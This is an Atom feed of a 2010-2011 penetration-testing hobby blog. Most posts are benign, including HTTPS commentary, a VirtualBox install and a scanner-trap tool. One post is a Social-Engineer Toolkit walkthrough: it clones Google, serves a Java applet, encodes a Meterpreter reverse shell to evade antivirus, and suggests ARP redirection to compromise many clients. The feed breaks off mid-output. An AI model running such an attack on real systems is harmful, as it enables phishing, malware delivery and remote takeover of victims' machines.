<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3698095189200084393</id><updated>2011-08-01T06:51:11.723-07:00</updated><title type='text'>Charles Watathi   ----   comps stuff, mostly</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-3244521064245540586</id><published>2011-05-27T23:13:00.000-07:00</published><updated>2011-05-27T23:14:44.647-07:00</updated><title type='text'>Blog Has Moved</title><content type='html'>The blog has moved to &lt;a href="http://netsecuritystuff.wordpress.com/"&gt;http://netsecuritystuff.wordpress.com/&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-3244521064245540586?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/3244521064245540586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/05/blog-has-moved.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3244521064245540586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3244521064245540586'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/05/blog-has-moved.html' title='Blog Has Moved'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-7461453502076747573</id><published>2011-02-15T00:50:00.000-08:00</published><updated>2011-03-29T11:01:22.973-07:00</updated><title type='text'>Another SEH tutorial</title><content type='html'>&lt;pre class="code"&gt;I have written a simple seh tutorial on my wordpress blog,&lt;br /&gt;kindly review it.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/"&gt;http://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/&lt;/a&gt;&lt;br /&gt;&lt;/pre&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;pre class="code"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-7461453502076747573?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/7461453502076747573/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/02/another-seh-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/7461453502076747573'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/7461453502076747573'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/02/another-seh-tutorial.html' title='Another SEH tutorial'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-7411360220076668637</id><published>2011-02-15T00:23:00.000-08:00</published><updated>2011-02-15T00:49:13.409-08:00</updated><title type='text'>Facebook, so close yet so far</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-ugT3K7Parr0/TVo9-Y0gtrI/AAAAAAAAACI/SlU-AGH5Kjk/s1600/snapshot16.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 163px;" src="http://2.bp.blogspot.com/-ugT3K7Parr0/TVo9-Y0gtrI/AAAAAAAAACI/SlU-AGH5Kjk/s320/snapshot16.png" alt="" id="BLOGGER_PHOTO_ID_5573835630848292530" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Have https, then have it optional, seriously ?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-7411360220076668637?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/7411360220076668637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/02/facebook-so-close-yet-so-far.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/7411360220076668637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/7411360220076668637'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/02/facebook-so-close-yet-so-far.html' title='Facebook, so close yet so far'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-ugT3K7Parr0/TVo9-Y0gtrI/AAAAAAAAACI/SlU-AGH5Kjk/s72-c/snapshot16.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-6310449204734746607</id><published>2011-02-02T22:52:00.000-08:00</published><updated>2011-02-02T22:56:35.462-08:00</updated><title type='text'>GSM Security</title><content type='html'>I had the priviledge of meeting &lt;a href="https://secure.wikimedia.org/wikipedia/en/wiki/Harald_Welte"&gt;Harald Welte&lt;/a&gt;  a few days ago and it was really amazing. This is the guru at gsm security in the world. He is the author openbsc, openmoko and many other many cool opensource projects. He managed to spark an interest of gsm security and I am currently looking at this complex stuff by the side. Thanks Harald .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-6310449204734746607?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/6310449204734746607/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/02/gsm-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6310449204734746607'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6310449204734746607'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/02/gsm-security.html' title='GSM Security'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-3239005296171429300</id><published>2011-01-25T10:59:00.000-08:00</published><updated>2011-01-25T11:04:01.565-08:00</updated><title type='text'>Installing virtualbox on backtrack 4 r2</title><content type='html'>&lt;span style="font-size:85%;"&gt;root@bt # echo "deb http://download.virtualbox.org/virtualbox/debian intrepid non-free" &gt;&gt; /etc/apt/sources.list&lt;br /&gt;&lt;br /&gt;root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -&lt;br /&gt;&lt;br /&gt;root@bt # apt-get update&lt;br /&gt;&lt;br /&gt;root@bt # apt-cache search virtualbox&lt;br /&gt;&lt;br /&gt;root@bt # apt-get install virtualbox-3.1&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-3239005296171429300?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/3239005296171429300/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/01/installing-virtualbox-on-backtrack-4-r2.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3239005296171429300'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3239005296171429300'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/01/installing-virtualbox-on-backtrack-4-r2.html' title='Installing virtualbox on backtrack 4 r2'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-4088033071969565248</id><published>2011-01-24T22:43:00.000-08:00</published><updated>2011-01-24T23:05:37.014-08:00</updated><title type='text'>Facebook and HTTPS</title><content type='html'>Roughly two weeks I came across an article at /dev/random that there was a malicious java script injected on facebook in a Tunisia ISP  that was capturing users user names and passwords &lt;a href="http://blog.rootshell.be/2011/01/13/tunisia-tracks-users-with-javascript-injection/"&gt;http://blog.rootshell.be/2011/01/13/tunisia-tracks-users-with-javascript-injection/&lt;/a&gt;&lt;br /&gt;Even if you were proxying through Tunisia, there could be a chance that your credentials were stolen. Today I woke up to read about how facebook dealt with the problem, guess what they used , https :) &lt;a href="http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/"&gt;http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044&lt;/a&gt;&lt;br /&gt;The register also confirmed this &lt;a href="http://www.theregister.co.uk/2011/01/25/tunisia_facebook_password_slurping/"&gt;http://www.theregister.co.uk/2011/01/25/tunisia_facebook_password_slurping/&lt;/a&gt;&lt;br /&gt;The question I always ask myself is why does facebook direct people to login to their http site while they have a https site where communication is encrypted? Even after the release of powerful tools such as wifizoo and firesheep which can be used to intercept http traffic with ease, why does the site with more than ~600 million people with accounts waiting for to use https as the default login page? &lt;br /&gt;To avoid these issues, I always have a mozilla plugin, https-everywhere to force redirection to https. There is another plugin also for mozilla called force-tls that does the same thing. So do the bright thing, use https.&lt;br /&gt;But even with https, be careful, awesome tools such as ssl-strip can be used with an man in the middle attack to strip out the ssl as the traffic. &lt;a href="http://www.securitytube.net/Stripping-SSL-and-Sniffing-HTTPS-using-SSLstrip-video.aspx"&gt;http://www.securitytube.net/Stripping-SSL-and-Sniffing-HTTPS-using-SSLstrip-video.aspx&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-4088033071969565248?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/4088033071969565248/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/01/facebook-and-https.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/4088033071969565248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/4088033071969565248'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/01/facebook-and-https.html' title='Facebook and HTTPS'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-353032368291135082</id><published>2011-01-17T23:11:00.001-08:00</published><updated>2011-01-17T23:14:28.540-08:00</updated><title type='text'>Sriking Back</title><content type='html'>Kindly look at this simple tool to use which you can use to "mess with hackers heads". Basically it starts a webserver on port 80 and creates random infinite urls. If somebody is running an automated web server scan against your webserver, it could be caught up in an infinite loop.&lt;br /&gt;&lt;br /&gt;Usage:&lt;br /&gt;Stop any webserver that could be running first, then initalise the script.&lt;br /&gt;&lt;br /&gt;# python spidertrap.py&lt;br /&gt;&lt;br /&gt;Then visit http:\\localhost with your browser and see.&lt;br /&gt;&lt;br /&gt;You can read more about this tool here &lt;a href="http://pauldotcom.com/wiki/index.php/Episode225"&gt;http://pauldotcom.com/wiki/index.php/Episode225&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Also for fun, I found this image, "we found the weakest link". In a geek way its funny . Have a look at it. &lt;a href="http://yfrog.com/hsfx3p"&gt;http://yfrog.com/hsfx3p&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-353032368291135082?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/353032368291135082/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/01/sriking-back.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/353032368291135082'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/353032368291135082'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2011/01/sriking-back.html' title='Sriking Back'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-6752447650887493004</id><published>2010-05-07T11:59:00.000-07:00</published><updated>2010-07-08T02:47:03.460-07:00</updated><title type='text'>Cool stuff that has come out</title><content type='html'>Well, new cool stuff that you should check out.&lt;br /&gt;&lt;br /&gt;Metasploit reverse_https payload-&lt;a href="http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html"&gt;http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Offensive security hacking challenge-&lt;a href="http://www.offensive-security.com/backtrack/how-strong-is-your-fu/"&gt;http://www.offensive-security.com/backtrack/how-strong-is-your-fu&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;New cool pentetsing vid by muts-&lt;a href="http://www.offensive-security.com/videos/penetration-testing-in-the-real-world/"&gt;href="http://www.offensive-security.com/videos/penetration-testing-in-the-real-world&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hackin9 goes digital and free-&lt;a href="http://download.hakin9.org/en/hakin9_04_2010_EN.pdf"&gt;href="http://download.hakin9.org/en/hakin9_04_2010_EN.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ssh honeypots --cool ----&lt;a href="http://pauldotcom.com/wiki/index.php/Episode194"&gt;href="http://pauldotcom.com/wiki/index.php/Episode194&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-6752447650887493004?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/6752447650887493004/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/05/cool-stuff-that-has-come-out.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6752447650887493004'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6752447650887493004'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/05/cool-stuff-that-has-come-out.html' title='Cool stuff that has come out'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-5162692938142180997</id><published>2010-03-25T00:15:00.000-07:00</published><updated>2010-03-25T00:17:26.311-07:00</updated><title type='text'>Msfencode a Msfpayload Into An Existing Executable</title><content type='html'>Totally awesome, and the executable still works and you get your  shell :)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://carnal0wnage.blogspot.com/2010/03/msfencode-msfpayload-into-existing.html"&gt;http://carnal0wnage.blogspot.com/2010/03/msfencode-msfpayload-into-existing.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-5162692938142180997?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/5162692938142180997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/03/msfencode-msfpayload-into-existing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5162692938142180997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5162692938142180997'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/03/msfencode-msfpayload-into-existing.html' title='Msfencode a Msfpayload Into An Existing Executable'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-5637650424906085978</id><published>2010-03-24T11:35:00.000-07:00</published><updated>2010-03-24T11:49:00.504-07:00</updated><title type='text'>Busting shells with the Digininja</title><content type='html'>For the past two weeks i had the honor of attending hacking classes taught by Robin Wood, the author of cewl, and a ton of other cool tools. It was great meeting him and i got to learn some cool new hacks. He even gave a talk on HFC at the end of the lessons, someone donated two laptops. M organizing how to get them to Uganda. One of those things i loved is on msf&gt; load sounds That really rocks. M spending this week reading the code for KreiosC2, a bot that can be controlled from twitter and trying to make it work. Thanks Robin.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-5637650424906085978?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/5637650424906085978/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/03/busting-shells-with-digininja.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5637650424906085978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5637650424906085978'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/03/busting-shells-with-digininja.html' title='Busting shells with the Digininja'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-8536380347258521070</id><published>2010-02-10T02:48:00.001-08:00</published><updated>2010-02-10T06:25:13.981-08:00</updated><title type='text'>Client Side exploits</title><content type='html'>Client side attacks nowadys have become a major focus when performing penetration tests. You are sure once you forward an infected word document or attach malicious exe`s on a pdf, someone in the organisation will open the document. It has become practically impossible to defend against such attacks . &lt;br /&gt;&lt;br /&gt;A while back  Valsmith,Colim ames, and David kerb released a great way to perform such client attacks during the Blackhat and Defcon conferences with the Metaphish paper and code. &lt;br /&gt;&lt;a href="http://attackresearch.com/pub.html"&gt;http://attackresearch.com/pub.html&lt;/a&gt;&lt;br /&gt;This brought a whole new aspect of using signed java applets to attack clients and attaching metasploit payloads to pdf documents.&lt;br /&gt;&lt;br /&gt;Since then David Kennedy with the Social Enginnering Framework and produced a marvelous automated tool called SET. SET allows you to perform all the above attacks and even more , one feature i love is the "website cloning feature", incorporate that with an arp redirect attack with ettercap, and you could pwn all the clients during a pentest. (with permission of course)Imagine cloning a site as common as "Google" or Facebook and then perfoming a java applet attack :) , total mass pwnage. On backtrack4 final, set is on the path /pentest/exploits/SET/set&lt;br /&gt;&lt;br /&gt;Usage: Commands are in bold&lt;br /&gt;&lt;br /&gt;I first downloaded google.com and moved it to /var/www/google/. a simple &lt;span style="font-weight:bold;"&gt;wget http://www.google.co.ke&lt;/span&gt; will do.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;cp -r www.google.co.ke/ /var/www/&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;cd /var/www/&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;mv www.google.co.ke  /var/www/google&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;cd /pentest/exploits/SET/&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;./set&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Select from the menu on what you would like to do:&lt;br /&gt;&lt;br /&gt;1. Automatic E-Mail Attacks (UPDATED)&lt;br /&gt;2. Website Java Applet Attack (UPDATED)&lt;br /&gt;3. Update Metasploit&lt;br /&gt;4. Update SET&lt;br /&gt;5. Create a Payload and Listener&lt;br /&gt;6. Help&lt;br /&gt;7. Exit the Toolkit&lt;br /&gt;&lt;br /&gt;Enter your choice: &lt;span style="font-weight:bold;"&gt;2&lt;/span&gt;&lt;br /&gt;Website Attack Vectors&lt;br /&gt;&lt;br /&gt;1. Let SET create a website for you&lt;br /&gt;2. Clone and setup a fake website (NEW)&lt;br /&gt;3. Import your own website (NEW)&lt;br /&gt;4. Return to main menu.&lt;br /&gt;&lt;br /&gt;Enter number: &lt;span style="font-weight:bold;"&gt;3&lt;/span&gt;&lt;br /&gt;Enter your current IP Address: &lt;span style="font-weight:bold;"&gt;192.168.20.1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Enter the path to the website to be cloned: &lt;span style="font-weight:bold;"&gt;/var/www/google/&lt;/span&gt;&lt;br /&gt;What payload do you want to generate:&lt;br /&gt;&lt;br /&gt;Name:                                      Description:&lt;br /&gt;&lt;br /&gt;1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.&lt;br /&gt;2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.&lt;br /&gt;3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.&lt;br /&gt;4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.&lt;br /&gt;5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline&lt;br /&gt;6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline&lt;br /&gt;7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter&lt;br /&gt;8. Import your own executable              Specify a path for your own executable&lt;br /&gt;&lt;br /&gt;Enter choice (example 1-4): &lt;span style="font-weight:bold;"&gt;2&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Below is a list of encodings to try and bypass AV.&lt;br /&gt;&lt;br /&gt;Select one of the below, Shikata_Ga_Nai is typically the best.&lt;br /&gt;&lt;br /&gt;1. avoid_utf8_tolower&lt;br /&gt;2. shikata_ga_nai&lt;br /&gt;3. alpha_mixed&lt;br /&gt;4. alpha_upper&lt;br /&gt;5. call4_dword_xor&lt;br /&gt;6. countdown&lt;br /&gt;7. fnstenv_mov&lt;br /&gt;8. jmp_call_additive&lt;br /&gt;9. nonalpha&lt;br /&gt;10. nonupper&lt;br /&gt;11. unicode_mixed&lt;br /&gt;12. unicode_upper&lt;br /&gt;13. alpha2&lt;br /&gt;14. No Encoding&lt;br /&gt;&lt;br /&gt;Enter your choice (enter for default): &lt;span style="font-weight:bold;"&gt;2&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Usually 1 to 4 does the trick, if you get an error messsage, some encoders don't like more than one. Specify 0 if you want.&lt;br /&gt;&lt;br /&gt;How many times do you want to encode the payload: &lt;span style="font-weight:bold;"&gt;4&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Enter the PORT of the listener: &lt;span style="font-weight:bold;"&gt;4444&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;[-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]&lt;br /&gt;&lt;br /&gt;[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)&lt;br /&gt;&lt;br /&gt;[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)&lt;br /&gt;&lt;br /&gt;[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)&lt;br /&gt;&lt;br /&gt;[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)&lt;br /&gt;…………………………..&lt;br /&gt;………………………..&lt;br /&gt;resource (src/program_junk/meta_config)&gt; use exploit/multi/handler&lt;br /&gt;resource (src/program_junk/meta_config)&gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;resource (src/program_junk/meta_config)&gt; set LHOST 192.168.20.1&lt;br /&gt;LHOST =&gt; 192.168.20.1&lt;br /&gt;resource (src/program_junk/meta_config)&gt; set LPORT 4444&lt;br /&gt;LPORT =&gt; 4444&lt;br /&gt;resource (src/program_junk/meta_config)&gt; set ENCODING shikata_ga_nai&lt;br /&gt;ENCODING =&gt; shikata_ga_nai&lt;br /&gt;resource (src/program_junk/meta_config)&gt; set ExitOnSession 